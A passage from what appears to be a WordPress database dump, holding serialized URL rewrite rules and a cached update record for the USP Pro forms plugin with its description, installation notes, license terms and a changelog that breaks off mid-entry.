true\";s:31:\"university/([^/]+)/trackback/?$\";s:37:\"index.php?university=$matches[1]&tb=1\";s:39:\"university/([^/]+)/page/?([0-9]{1,})/?$\";s:50:\"index.php?university=$matches[1]&paged=$matches[2]\";s:46:\"university/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?university=$matches[1]&cpage=$matches[2]\";s:35:\"university/([^/]+)(?:/([0-9]+))?/?$\";s:49:\"index.php?university=$matches[1]&page=$matches[2]\";s:27:\"university/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"university/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"university/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"university/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"university/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"university/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:12:\"sitemap\\.xml\";s:23:\"index.php?sitemap=index\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:38:\"index.php?&page_id=9&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(5718,'edd_sl_5e385346d02213000eca342d0529d20f','a:2:{s:7:\"timeout\";i:1629086412;s:5:\"value\";s:49102:\"{\"new_version\":\"4.0\",\"stable_version\":\"4.0\",\"name\":\"USP Pro Personal\",\"slug\":\"usp-pro\",\"url\":\"https:\\/\\/plugin-planet.com\\/downloads\\/usp-pro-personal\\/?changelog=1\",\"last_updated\":\"2 weeks ago\",\"homepage\":\"https:\\/\\/plugin-planet.com\\/usp-pro\\/\",\"package\":\"https:\\/\\/plugin-planet.com\\/edd-sl\\/package_download\\/MTYyOTEzNjg4NzplYzBmMzA4NjRmNDkwMzUyY2FhOTA0Zjk1ZjQ4OGU5OToxMDg6NjgwZTBhMWNlNmY0NDEwNzdjYjZkMTNlMTMzMGM5NDg6aHR0cEAvL2xvY2FsaG9zdC9la21zOjA=\",\"download_link\":\"https:\\/\\/plugin-planet.com\\/edd-sl\\/package_download\\/MTYyOTEzNjg4NzplYzBmMzA4NjRmNDkwMzUyY2FhOTA0Zjk1ZjQ4OGU5OToxMDg6NjgwZTBhMWNlNmY0NDEwNzdjYjZkMTNlMTMzMGM5NDg6aHR0cEAvL2xvY2FsaG9zdC9la21zOjA=\",\"sections\":{\"description\":\"<p>USP Pro is your complete front-end forms solution, enabling you to create unlimited forms and let visitors submit content, register, and much more.<\\/p>\\n<h3>Features<\\/h3>\\n<p>Visit the <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro\\/\\\">USP Pro Homepage<\\/a> for features, screenshots, and details.<\\/p>\\n<h3>Getting Started<\\/h3>\\n<p>Check out the <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-quick-start\\/\\\">Quick Start Guide<\\/a> for USP Pro.<\\/p>\\n<h3>Documentation<\\/h3>\\n<p>Official USP Pro documentation:<\\/p>\\n<ul>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-settings\\/\\\">USP Pro Settings<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-shortcodes\\/\\\">USP Pro Shortcodes<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-template-tags\\/\\\">USP Pro Template Tags<\\/a><\\/li>\\n<\\/ul>\\n<h3>Resources<\\/h3>\\n<p>Further resources and information:<\\/p>\\n<ul>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/docs+usp-pro\\/\\\">USP Pro Docs<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/forum+usp-pro\\/\\\">USP Pro Forum<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/tuts+usp-pro\\/\\\">USP Pro Tutorials<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-faqs\\/\\\">USP Pro FAQs<\\/a><\\/li>\\n<\\/ul>\\n<h3>Stay Current<\\/h3>\\n<p>Stay current with USP Pro:<\\/p>\\n<ul>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/news+usp-pro\\/\\\">USP Pro News<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/news\\/feed\\/\\\">Grab the News Feed<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/tuts\\/feed\\/\\\">Grab the Tutorials Feed<\\/a><\\/li>\\n<\\/ul>\\n<h3>Getting Help<\\/h3>\\n<p>There are two channels for getting help:<\\/p>\\n<ul>\\n<li>Ask a question in the <a href=\\\"https:\\/\\/plugin-planet.com\\/category\\/forum+usp-pro\\/\\\">USP Pro Forum<\\/a> (<a href=\\\"https:\\/\\/plugin-planet.com\\/wp\\/wp-login.php\\\">login required<\\/a>)<\\/li>\\n<li>Send an email via the <a href=\\\"https:\\/\\/plugin-planet.com\\/support\\/#contact\\\">contact form<\\/a><\\/li>\\n<\\/ul>\\n<p>The contact form is best for direct support, bug reports, and feedback.<\\/p>\\n<h3>Downloads<\\/h3>\\n<ul>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/wp\\/wp-login.php\\\">Log in to your account<\\/a> for current downloads.<\\/li>\\n<\\/ul>\\n<p>To learn more about USP Pro, visit <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro\\/\\\">Plugin-Planet.com<\\/a>.<\\/p>\\n<h3>Privacy<\\/h3>\\n<p><strong>User Data:<\\/strong> User Submitted Posts (USP) enables users to submit post content. It collects data <em>only<\\/em> from users who voluntarily submit content via the USP form. The only involuntary data that is collected is the IP address of the person submitting the form. The plugin provides an option to disable IP collection completely.<\\/p>\\n<p><strong>Cookies:<\\/strong> This plugin uses simple cookies to enable dynamic form functionality. No cookies are used for any other purpose.<\\/p>\\n<p><strong>Services:<\\/strong> This plugin provides an option to enable Google reCaptcha, which is provided by Google as a third-party service. For details on privacy and more, please refer to official documentation for <a href=\\\"https:\\/\\/developers.google.com\\/recaptcha\\/\\\">Google reCaptcha<\\/a>. No other outside services or locations are accessed\\/used by this plugin.<\\/p>\\n<h3>License<\\/h3>\\n<p>License: The USP Pro license comprises two parts:<\\/p>\\n<ul>\\n<li>\\n<p><strong>Part 1:<\\/strong> Its PHP code is licensed under the GPL (v2 or later), like WordPress. <a href=\\\"https:\\/\\/www.gnu.org\\/licenses\\/\\\">More info<\\/a>.<\\/p>\\n<\\/li>\\n<li>\\n<p><strong>Part 2:<\\/strong> Everything else (e.g., CSS, HTML, JavaScript, images, design) is licensed according to the purchased license. <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro\\/\\\">More info<\\/a>.<\\/p>\\n<\\/li>\\n<\\/ul>\\n<p>Without prior written consent from Monzilla Media, you must NOT directly or indirectly: license, sub-license, sell, resell, or provide for free any aspect or component of Part 2.<\\/p>\\n<p>Further license information is available in the plugin directory, <code>\\/license\\/<\\/code>, and <a href=\\\"https:\\/\\/plugin-planet.com\\/wp\\/files\\/usp-pro\\/license.txt\\\">online<\\/a>.<\\/p>\\n<p><strong>Upgrades:<\\/strong> Your purchase of USP Pro includes free lifetime upgrades, which include new features, bug fixes, and other improvements. <\\/p>\\n<p>Copyright 2021 Monzilla Media. All rights reserved.<h3>Check out my other plugins<\\/h3>\\nFree WordPress plugins:<\\/p>\\n<ul>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/banhammer\\/\\\">Banhammer<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/host-header-injection-fix\\/\\\">Host Header Injection Fix<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/blackhole-bad-bots\\/\\\">Blackhole for Bad Bots<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/block-bad-queries\\/\\\">BBQ Firewall<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/contact-coldform\\/\\\">Contact Coldform<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/dashboard-widgets-suite\\/\\\">Dashboard Widgets Suite<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/ga-google-analytics\\/\\\">GA Google Analytics<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/head-meta-data\\/\\\">Head Meta Data<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/show-support-ribbon\\/\\\">Show Support Ribbon<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/simple-ajax-chat\\/\\\">Simple Ajax Chat<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/simple-basic-contact-form\\/\\\">Simple Basic Contact Form<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/simple-blog-stats\\/\\\">Simple Blog Stats<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/simple-custom-content\\/\\\">Simple Custom Content<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/simple-feed-stats\\/\\\">Simple Feed Stats<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/user-submitted-posts\\/\\\">User Submitted Posts<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/theme-switcha\\/\\\">Theme Switcha<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/wordpress.org\\/plugins\\/prismatic\\/\\\">Prismatic<\\/a><\\/li>\\n<\\/ul>\\n<p>Premium WordPress plugins:<\\/p>\\n<ul>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/banhammer-pro\\/\\\">Banhammer Pro<\\/a>    - Monitor traffic and ban bad users and bots<\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/bbq-pro\\/\\\">BBQ Pro<\\/a>                - Fastest firewall plugin for WordPress<\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/blackhole-pro\\/\\\">Blackhole Pro<\\/a>    - Block bad bots in a virtual black hole<\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/ga-google-analytics-pro\\/\\\">GA Pro<\\/a> - Connect WordPress to Google Analytics<\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/ses-pro\\/\\\">SES Pro<\\/a>                - Ajax-powered email signup forms<\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro\\/\\\">USP Pro<\\/a>                - Advanced front-end forms<\\/li>\\n<\\/ul>\\n<p>More awesome plugins on the way :)<\\/p>\",\"installation\":\"<h3>Installation<\\/h3>\\n<ol>\\n<li>Upload the plugin and activate via the WP Plugins screen<\\/li>\\n<li>Visit Plugins &gt; USP Pro License to enter your license<\\/li>\\n<\\/ol>\\n<p>Done. USP Pro is now ready for use. Before going further, please read the <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-quick-start\\/\\\">USP Pro Quick Start Guide<\\/a>. <\\/p>\\n<p>Learn more about <a href=\\\"https:\\/\\/wordpress.org\\/support\\/article\\/managing-plugins\\/#installing-plugins\\\">installing plugins<\\/a>.<\\/p>\\n<h3>Usage<\\/h3>\\n<p>Usage information available in the <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-quick-start\\/\\\">USP Pro Quick Start Guide<\\/a>.<\\/p>\\n<p>Complete plugin documentation available at <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro\\/\\\">Plugin-Planet.com<\\/a>. <\\/p>\\n<h3>Upgrades<\\/h3>\\n<p>Your purchase of USP Pro includes free lifetime upgrades, which include new features, bug fixes, and other improvements. When an upgrade is available, WordPress will notify you in the Admin Area. When you see that there is an update available, just click &quot;Update&quot; and WordPress will perform the upgrade automatically. Note that you can <a href=\\\"https:\\/\\/plugin-planet.com\\/download-purchased-plugin\\/\\\">download the latest version of USP Pro at Plugin Planet<\\/a> anytime at your convenience.<\\/p>\\n<p><strong>Pro Tip:<\\/strong> Before upgrading, visit &quot;Tools &gt; Backup &amp; Restore&quot; to back up your current settings. That way if something should go wrong, you can always restore your original settings and start over.<\\/p>\\n<h3>Supported languages<\\/h3>\\n<p>USP Pro includes translations for the following languages:<\\/p>\\n<pre><code>English   = default\\nSlovenian = usp-pro-sl_SI\\nDanish    = usp-pro-da_DK<\\/code><\\/pre>\\n<p><a href=\\\"https:\\/\\/plugin-planet.com\\/#contact\\\">Contact us<\\/a> to request another language.<\\/p>\\n<h3>Shortcodes<\\/h3>\\n<p>Visit the <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-shortcodes\\/\\\">USP Pro Shortcodes Reference<\\/a>.<\\/p>\\n<p><strong>Note:<\\/strong> USP Forms must be published (not draft or pending) in order to display via their respective shortcodes.<\\/p>\\n<h3>Template Tags<\\/h3>\\n<p>Visit the <a href=\\\"https:\\/\\/plugin-planet.com\\/usp-pro-template-tags\\/\\\">USP Pro Template Tags Reference<\\/a>.<\\/p>\\n<h3>License Information<\\/h3>\\n<ul>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/download-purchased-plugin\\/\\\">Download purchased plugin<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/install-plugin\\/\\\">Install purchased plugin<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/upgrade-plugin\\/\\\">Upgrade purchased plugin<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/get-license-key\\/\\\">Get plugin license key<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/activate-deactivate-plugin-license\\/\\\">Activate plugin license<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/transfer-plugin-license\\/\\\">Transfer plugin license<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/manage-license\\/\\\">Manage licensed domains<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/download-purchase-receipt\\/\\\">Download purchase receipt<\\/a><\\/li>\\n<li><a href=\\\"https:\\/\\/plugin-planet.com\\/troubleshooting-license-activation\\/\\\">Troubleshooting license activation<\\/a><\\/li>\\n<\\/ul>\\n<h3>Restore Default Options<\\/h3>\\n<p>To restore default plugin options, either uninstall\\/reinstall the plugin, or visit the plugin\'s Tools settings &gt; &quot;Restore Default Settings&quot;.<\\/p>\\n<h3>Uninstalling<\\/h3>\\n<p>USP Pro cleans up after itself. All plugin options will be removed from the database when the plugin is uninstalled via the Plugins screen. All submitted posts will NOT be removed when deactivating or uninstalling the plugin. <em>All submitted posts must be removed manually<\\/em> (if you want\\/choose to remove them).<\\/p>\\n<h3>Like the plugin?<\\/h3>\\n<p>If you like USP Pro, please take a moment to <a href=\\\"https:\\/\\/wordpress.org\\/support\\/plugin\\/user-submitted-posts\\/reviews\\/?rate=5#new-post\\\">give a 5-star rating<\\/a>. It helps to keep development and support going strong. Thank you!<\\/p>\",\"changelog\":\"<p>If you like USP, please take a moment to <a href=\\\"https:\\/\\/wordpress.org\\/support\\/plugin\\/user-submitted-posts\\/reviews\\/?rate=5#new-post\\\">give a 5-star rating<\\/a>. It helps to keep development and support going strong. Thank you!<\\/p>\\n<p><strong>4.0<\\/strong><\\/p>\\n<ul>\\n<li>Improves logic of <code>usp_form()<\\/code><\\/li>\\n<li>Adds <code>%%delete_link%%<\\/code> for email alerts<\\/li>\\n<li>Adds CSS classes to Login\\/Register form<\\/li>\\n<li>Adds filter hook <code>usp_submission_redirect<\\/code><\\/li>\\n<li>Adds <code>selected<\\/code> to select field default option<\\/li>\\n<li>Changes Description field to textarea for user registration demo<\\/li>\\n<li>Fixes renaming\\/duplicate bug with demo forms<\\/li>\\n<li>Fixes bug with email alert shortcut variables<\\/li>\\n<li>Moves &quot;Tips &amp; Tricks&quot; to post at Plugin Planet<\\/li>\\n<li>Refines the plugin settings pages<\\/li>\\n<li>Tests on WordPress 5.8<\\/li>\\n<\\/ul>\\n<p><strong>3.9<\\/strong><\\/p>\\n<ul>\\n<li>Adds <code>[url_link]<\\/code> user shortcode<\\/li>\\n<li>Adds filter hook <code>usp_shortcode_url_link<\\/code><\\/li>\\n<li>Adds support to change reCaptcha language<\\/li>\\n<li>Adds filter hook <code>usp_recaptcha_querystring<\\/code><\\/li>\\n<li>Updates Selectize.js frontend control script<\\/li>\\n<li>Updates Parsley.js frontend validation script<\\/li>\\n<li>Updates Vex.js library for modal dialog popups<\\/li>\\n<li>Updates deprecated functions for newer jQuery<\\/li>\\n<li>Updates inline graphics in plugin settings<\\/li>\\n<li>Improves\\/updates readme.txt\\/docs<\\/li>\\n<li>Tests on WordPress 5.7<\\/li>\\n<\\/ul>\\n<p><strong>3.8<\\/strong><\\/p>\\n<ul>\\n<li>Fixes &quot;array offset&quot; PHP notice<\\/li>\\n<li>Fixes &quot;curly braces&quot; PHP notice<\\/li>\\n<li>Fixes bug with numerical taxonomy terms<\\/li>\\n<li>Fixes bug with submit button not displayed<\\/li>\\n<li>Adds support for disable-comments checkbox<\\/li>\\n<li>Updates default translation template<\\/li>\\n<li>Improves\\/updates readme.txt\\/docs<\\/li>\\n<li>Updates license updater script<\\/li>\\n<li>Tests on PHP 7.4 and 8.0<\\/li>\\n<li>Tests on WordPress 5.6<\\/li>\\n<\\/ul>\\n<p><strong>3.7<\\/strong><\\/p>\\n<ul>\\n<li>\\n<p>Adds <code>form_id<\\/code> query parameter to form POST requests<\\/p>\\n<\\/li>\\n<li>\\n<p>Adds <code>post_link<\\/code> attribute to <code>[usp_pro_display_posts]<\\/code><\\/p>\\n<\\/li>\\n<li>\\n<p>Adds <code>link_title<\\/code> attribute to <code>[usp_pro_display_posts]<\\/code><\\/p>\\n<\\/li>\\n<li>\\n<p>Improves support for multiple forms on the same page<\\/p>\\n<\\/li>\\n<li>\\n<p>Updates default JavaScript support for multiple forms<\\/p>\\n<\\/li>\\n<li>\\n<p>Improves dashboard widget, adds new hooks: <\\/p>\\n<ul>\\n<li><code>usp_widget_drafts_display<\\/code><\\/li>\\n<li><code>usp_widget_display_all_posts<\\/code><\\/li>\\n<li><code>usp_widget_drafts_message_none<\\/code><\\/li>\\n<li><code>usp_widget_drafts_message_some<\\/code><\\/li>\\n<\\/ul>\\n<\\/li>\\n<li>\\n<p>Login form displays &quot;Register&quot; tab only if registration is enabled<\\/p>\\n<\\/li>\\n<li>\\n<p>Fixes bug: dashboard widget not showing all submitted posts<\\/p>\\n<\\/li>\\n<li>\\n<p>Fixes bug: numeric values now working for custom taxonomy<\\/p>\\n<\\/li>\\n<li>\\n<p>Fixes bug: form styles not included with success message<\\/p>\\n<\\/li>\\n<li>\\n<p>Fixes bug: duplicate post feature not working for CPTs<\\/p>\\n<\\/li>\\n<li>\\n<p>Fixes bug: content filter not working for excerpts<\\/p>\\n<\\/li>\\n<li>\\n<p>Refines default form styles<\\/p>\\n<\\/li>\\n<li>\\n<p>Improves loading of admin CSS\\/JS assets<\\/p>\\n<\\/li>\\n<li>\\n<p>Updates default translation template<\\/p>\\n<\\/li>\\n<li>\\n<p>Refines plugin setting page styles<\\/p>\\n<\\/li>\\n<li>\\n<p>Updates license updater script<\\/p>\\n<\\/li>\\n<li>\\n<p>Refines readme\\/documentation<\\/p>\\n<\\/li>\\n<li>\\n<p>Tests on WordPress 5.5<\\/p>\\n<\\/li>\\n<\\/ul>\\n<p><strong>3.6<\\/strong><\\/p>\\n<ul>\\n<li>Adds Google reCaptcha v3 (hidden reCaptcha)<\\/li>\\n<li>Updates reCaptcha library to version 1.2.4<\\/li>\\n<li>Adds filter hook <code>hook usp_recaptcha_score<\\/code><\\/li>\\n<li>Adds filter hook <code>usp_display_posts_noposts<\\/code><\\/li>\\n<li>Adds filter hook <code>usp_post_tags_use_id<\\/code><\\/li>\\n<li>Adds form-id parameter to <code>usp_form_custom_output<\\/code><\\/li>\\n<li>Adds selectize.js fancy script to tag select field<\\/li>\\n<li>Enables default option for &quot;External Stylesheet&quot;<\\/li>\\n<li>Enables default option for &quot;Include Parsley.js&quot;<\\/li>\\n<li>Generates new default translation template<\\/li>\\n<li>Improves accuracy on plugin settings page<\\/li>\\n<li>Improves styles on plugin settings page<\\/li>\\n<li>Improves styles of USP filter buttons<\\/li>\\n<li>Improves security of form cookies<\\/li>\\n<li>Improves Quicktag button infos<\\/li>\\n<li>Tests on WordPress 5.3<\\/li>\\n<\\/ul>\\n<p><strong>3.5.1<\\/strong><\\/p>\\n<ul>\\n<li>Fixes bug with new &quot;fancy&quot; category field<\\/li>\\n<li>Tests on WordPress 